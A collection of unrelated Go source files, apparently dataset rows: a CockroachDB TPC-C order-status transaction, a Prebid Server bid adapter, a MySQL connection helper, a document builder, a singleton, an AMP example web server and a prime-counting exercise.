// and 40% by number.
if rng.Intn(100) < 60 {
d.cLast = string(o.config.randCLast(rng, &o.a))
atomic.AddUint64(&o.config.auditor.orderStatusByLastName, 1)
} else {
d.cID = o.config.randCustomerID(rng)
}
tx, err := o.mcp.Get().BeginEx(ctx, o.config.txOpts)
if err != nil {
return nil, err
}
if err := crdb.ExecuteInTx(
ctx, (*workload.PgxTx)(tx),
func() error {
// 2.6.2.2 explains this entire transaction.
// Select the customer
if d.cID != 0 {
// Case 1: select by customer id
if err := o.selectByCustID.QueryRowTx(
ctx, tx, wID, d.dID, d.cID,
).Scan(&d.cBalance, &d.cFirst, &d.cMiddle, &d.cLast); err != nil {
return errors.Wrap(err, "select by customer idfail")
}
} else {
// Case 2: Pick the middle row, rounded up, from the selection by last name.
rows, err := o.selectByLastName.QueryTx(ctx, tx, wID, d.dID, d.cLast)
if err != nil {
return errors.Wrap(err, "select by last name fail")
}
customers := make([]customerData, 0, 1)
for rows.Next() {
c := customerData{}
err = rows.Scan(&c.cID, &c.cBalance, &c.cFirst, &c.cMiddle)
if err != nil {
rows.Close()
return err
}
customers = append(customers, c)
}
if err := rows.Err(); err != nil {
return err
}
rows.Close()
if len(customers) == 0 {
return errors.New("found no customers matching query orderStatus.selectByLastName")
}
cIdx := (len(customers) - 1) / 2
c := customers[cIdx]
d.cID = c.cID
d.cBalance = c.cBalance
d.cFirst = c.cFirst
d.cMiddle = c.cMiddle
}
// Select the customer's order.
if err := o.selectOrder.QueryRowTx(
ctx, tx, wID, d.dID, d.cID,
).Scan(&d.oID, &d.oEntryD, &d.oCarrierID); err != nil {
return errors.Wrap(err, "select order fail")
}
// Select the items from the customer's order.
rows, err := o.selectItems.QueryTx(ctx, tx, wID, d.dID, d.oID)
if err != nil {
return errors.Wrap(err, "select items fail")
}
defer rows.Close()
// On average there's 10 items per order - 2.4.1.3
d.items = make([]orderItem, 0, 10)
for rows.Next() {
item := orderItem{}
if err := rows.Scan(&item.olIID, &item.olSupplyWID, &item.olQuantity, &item.olAmount, &item.olDeliveryD); err != nil {
return err
}
d.items = append(d.items, item)
}
return rows.Err()
}); err != nil {
return nil, err
}
return d, nil
}
|
package between
import (
"encoding/json"
"fmt"
"net/http"
"net/url"
"strconv"
"text/template"
"github.com/prebid/openrtb/v19/openrtb2"
"github.com/prebid/prebid-server/adapters"
"github.com/prebid/prebid-server/config"
"github.com/prebid/prebid-server/errortypes"
"github.com/prebid/prebid-server/macros"
"github.com/prebid/prebid-server/openrtb_ext"
)
type BetweenAdapter struct {
EndpointTemplate *template.Template
}
func (a *BetweenAdapter) MakeRequests(request *openrtb2.BidRequest, reqInfo *adapters.ExtraRequestInfo) ([]*adapters.RequestData, []error) {
var errors []error
if len(request.Imp) == 0 {
return nil, []error{&errortypes.BadInput{
Message: fmt.Sprintf("No valid Imps in Bid Request"),
}}
}
ext, errors := preprocess(request)
if errors != nil && len(errors) > 0 {
return nil, errors
}
endpoint, err := a.buildEndpointURL(ext)
if err != nil {
return nil, []error{&errortypes.BadInput{
Message: fmt.Sprintf("Failed to build endpoint URL: %s", err),
}}
}
data, err := json.Marshal(request)
if err != nil {
return nil, []error{&errortypes.BadInput{
Message: fmt.Sprintf("Error in packaging request to JSON"),
}}
}
headers := http.Header{}
headers.Add("Content-Type", "application/json;charset=utf-8")
headers.Add("Accept", "application/json")
if request.Device != nil {
addHeaderIfNonEmpty(headers, "User-Agent", request.Device.UA)
addHeaderIfNonEmpty(headers, "X-Forwarded-For", request.Device.IP)
addHeaderIfNonEmpty(headers, "Accept-Language", request.Device.Language)
if request.Device.DNT != nil {
addHeaderIfNonEmpty(headers, "DNT", strconv.Itoa(int(*request.Device.DNT)))
}
}
if request.Site != nil {
addHeaderIfNonEmpty(headers, "Referer", request.Site.Page)
}
return []*adapters.RequestData{{
Method: "POST",
Uri: endpoint,
Body: data,
Headers: headers,
}}, errors
}
func unpackImpExt(imp *openrtb2.Imp) (*openrtb_ext.ExtImpBetween, error) {
var bidderExt adapters.ExtImpBidder
if err := json.Unmarshal(imp.Ext, &bidderExt); err != nil {
return nil, &errortypes.BadInput{
Message: fmt.Sprintf("ignoring imp id=%s, invalid BidderExt", imp.ID),
}
}
var betweenExt openrtb_ext.ExtImpBetween
if err := json.Unmarshal(bidderExt.Bidder, &betweenExt); err != nil {
return nil, &errortypes.BadInput{
Message: fmt.Sprintf("ignoring imp id=%s, invalid ImpExt", imp.ID),
}
}
return &betweenExt, nil
}
func (a *BetweenAdapter) buildEndpointURL(e *openrtb_ext.ExtImpBetween) (string, error) {
missingRequiredParameterMessage := "required BetweenSSP parameter \"%s\" is missing"
if e.Host == "" {
return "", &errortypes.BadInput{
Message: fmt.Sprintf(missingRequiredParameterMessage, "host"),
}
}
if e.PublisherID == "" {
return "", &errortypes.BadInput{
Message: fmt.Sprintf(missingRequiredParameterMessage, "publisher_id"),
}
}
return macros.ResolveMacros(a.EndpointTemplate, macros.EndpointTemplateParams{Host: e.Host, PublisherID: e.PublisherID})
}
func buildImpBanner(imp *openrtb2.Imp) error {
if imp.Banner == nil {
return &errortypes.BadInput{
Message: fmt.Sprintf("Request needs to include a Banner object"),
}
}
banner := *imp.Banner
if banner.W == nil && banner.H == nil {
if len(banner.Format) == 0 {
return &errortypes.BadInput{
Message: fmt.Sprintf("Need at least one size to build request"),
}
}
format := banner.Format[0]
banner.Format = banner.Format[1:]
banner.W = &format.W
banner.H = &format.H
imp.Banner = &banner
}
return nil
}
// Add Between required properties to Imp object
func addImpProps(imp *openrtb2.Imp, secure *int8, betweenExt *openrtb_ext.ExtImpBetween) {
imp.Secure = secure
}
// Adding header fields to request header
func addHeaderIfNonEmpty(headers http.Header, headerName string, headerValue string) {
if len(headerValue) > 0 {
headers.Add(headerName, headerValue)
}
}
// Handle request errors and formatting to be sent to Between
func preprocess(request *openrtb2.BidRequest) (*openrtb_ext.ExtImpBetween, []error) {
errors := make([]error, 0, len(request.Imp))
resImps := make([]openrtb2.Imp, 0, len(request.Imp))
secure := int8(0)
if request.Site != nil && request.Site.Page != "" {
pageURL, err := url.Parse(request.Site.Page)
if err == nil && pageURL.Scheme == "https" {
secure = int8(1)
}
}
var betweenExt *openrtb_ext.ExtImpBetween
for _, imp := range request.Imp {
var err error
betweenExt, err = unpackImpExt(&imp)
if err != nil {
errors = append(errors, err)
continue
}
addImpProps(&imp, &secure, betweenExt)
if err := buildImpBanner(&imp); err != nil {
errors = append(errors, err)
continue
}
resImps = append(resImps, imp)
}
request.Imp = resImps
return betweenExt, errors
}
func (a *BetweenAdapter) MakeBids(internalRequest *openrtb2.BidRequest, externalRequest *adapters.RequestData, response *adapters.ResponseData) (*adapters.BidderResponse, []error) {
if response.StatusCode == http.StatusNoContent {
// no bid response
return nil, nil
}
if response.StatusCode != http.StatusOK {
return nil, []error{&errortypes.BadServerResponse{
Message: fmt.Sprintf("Invalid Status Returned: %d. Run with request.debug = 1 for more info", response.StatusCode),
}}
}
var bidResp openrtb2.BidResponse
if err := json.Unmarshal(response.Body, &bidResp); err != nil {
return nil, []error{&errortypes.BadServerResponse{
Message: fmt.Sprintf("Unable to unpackage bid response. Error %s", err.Error()),
}}
}
bidResponse := adapters.NewBidderResponseWithBidsCapacity(1)
for _, sb := range bidResp.SeatBid {
for i := range sb.Bid {
bidResponse.Bids = append(bidResponse.Bids, &adapters.TypedBid{
Bid: &sb.Bid[i],
BidType: openrtb_ext.BidTypeBanner,
})
}
}
return bidResponse, nil
}
// Builder builds a new instance of the Between adapter for the given bidder with the given config.
func Builder(bidderName openrtb_ext.BidderName, config config.Adapter, server config.Server) (adapters.Bidder, error) {
template, err := template.New("endpointTemplate").Parse(config.Endpoint)
if err != nil {
return nil, fmt.Errorf("unable to parse endpoint url template: %v", err)
}
bidder := BetweenAdapter{
EndpointTemplate: template,
}
return &bidder, nil
}
|
package main
import (
"log"
"os"
"github.com/jmoiron/sqlx"
)
func dbInit() *sqlx.DB {
username := os.Getenv("OGRE_DB_USERNAME")
password := os.Getenv("OGRE_DB_PASSWORD")
host := os.Getenv("OGRE_DB_HOSTNAME")
dbname := os.Getenv("OGRE_DB_NAME")
db := dbConnect(username, password, host, dbname)
return db
}
func dbConnect(username string, password string, host string, dbname string) *sqlx.DB {
db, err := sqlx.Connect("mysql", username+":"+password+"@"+host+"/"+dbname)
if err != nil {
log.Fatalln(err)
}
return db
}
|
package document
import "time"
func NewBuilder() DocumentBuilder {
return &documentBuilder{}
}
type document struct {
id int64
uuid string
name string
content string
created time.Time
lastModified time.Time
}
type Document interface {
Id() int64
Uuid() string
Name() string
Content() string
Created() time.Time
LastModified() time.Time
}
func (d *document) Id() int64 {
return d.id
}
func (d *document) Uuid() string {
return d.uuid
}
func (d *document) Name() string {
return d.name
}
func (d *document) Content() string {
return d.content
}
func (d *document) Created() time.Time {
return d.created
}
func (d *document) LastModified() time.Time {
return d.lastModified
}
type documentBuilder struct {
id int64
uuid string
name string
content string
created time.Time
lastModified time.Time
}
type DocumentBuilder interface {
WithId(int64) DocumentBuilder
WithUuid(string) DocumentBuilder
WithName(string) DocumentBuilder
WithContent(string) DocumentBuilder
WithCreated(time.Time) DocumentBuilder
WithLastModified(time.Time) DocumentBuilder
Build() Document
}
func (b *documentBuilder) WithId(id int64) DocumentBuilder {
b.id = id
return b
}
func (b *documentBuilder) WithUuid(uuid string) DocumentBuilder {
b.uuid = uuid
return b
}
func (b *documentBuilder) WithName(name string) DocumentBuilder {
b.name = name
return b
}
func (b *documentBuilder) WithContent(content string) DocumentBuilder {
b.content = content
return b
}
func (b *documentBuilder) WithCreated(created time.Time) DocumentBuilder {
b.created = created
return b
}
func (b *documentBuilder) WithLastModified(lastModified time.Time) DocumentBuilder {
b.lastModified = lastModified
return b
}
func (b *documentBuilder) Build() Document {
return &document{
id: b.id,
uuid: b.uuid,
name: b.name,
content: b.content,
created: b.created,
lastModified: b.lastModified,
}
}
|
package emperor2
import (
"fmt"
"sync"
)
type emperor struct {
Name string
}
func (e emperor) Say() {
fmt.Printf("my name: %s\n", e.Name)
}
var singleton *emperor
var lock *sync.Mutex = &sync.Mutex{}
func GetInstance() *emperor {
if singleton == nil {
lock.Lock()
defer lock.Unlock()
if singleton == nil {
singleton = &emperor{}
}
}
return singleton
}
|
// Copyright Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"backend"
"net/http"
"os"
"playground"
"strings"
)
const (
MAX_AGE_IN_SECONDS = 180 // three minutes
OLD_ADDRESS = "amp-by-example.appspot.com"
DIST_DIR = "dist"
)
func init() {
backend.InitRedirects()
backend.InitAmpLiveList()
backend.InitAmpForm()
backend.InitAmpCache()
backend.InitProductBrowse()
backend.InitHousingForm()
backend.InitAmpAnalytics()
backend.InitCommentSection()
backend.InitHotelSample()
backend.InitSlowResponseSample()
backend.InitPollSample()
backend.InitRatingSample()
backend.InitAutosuggestSample()
backend.InitPagedListSample()
backend.InitAmpAccess()
backend.InitFavoriteSample()
backend.InitCheckout()
backend.InitAmpConsent()
backend.InitAmpStoryAutoAds()
backend.InitLetsEncrypt()
playground.InitPlayground()
http.Handle("/", ServeStaticFiles(HandleNotFound(http.FileServer(http.Dir(DIST_DIR)))))
}
func HandleNotFound(h http.Handler) http.HandlerFunc {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if strings.HasSuffix(r.URL.Path, "/") && !exists(DIST_DIR+r.URL.Path+"index.html") {
http.NotFound(w, r)
return
}
h.ServeHTTP(w, r)
})
}
func ServeStaticFiles(h http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.Host == OLD_ADDRESS || backend.IsInsecureRequest(r) {
backend.RedirectToSecureVersion(w, r)
return
}
backend.EnableCors(w, r)
backend.SetDefaultMaxAge(w)
h.ServeHTTP(w, r)
})
}
func exists(path string) bool {
if _, err := os.Stat(path); err == nil {
return true
}
return false
}
|
// 判断 101-200 之间有多少个素数,并输出所有素数。
package main
import (
"fmt"
"math"
)
func main() {
count := 0 //合数个数
for i := 101; i <= 200; i++ {
mid := int(math.Sqrt(float64(i)))
for j := 2; j <= mid; j++ {
if i%j == 0 {
//fmt.Println(i)//符合条件的即为合数
count = count + 1
break
}
}
}
fmt.Println(100 - count)
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.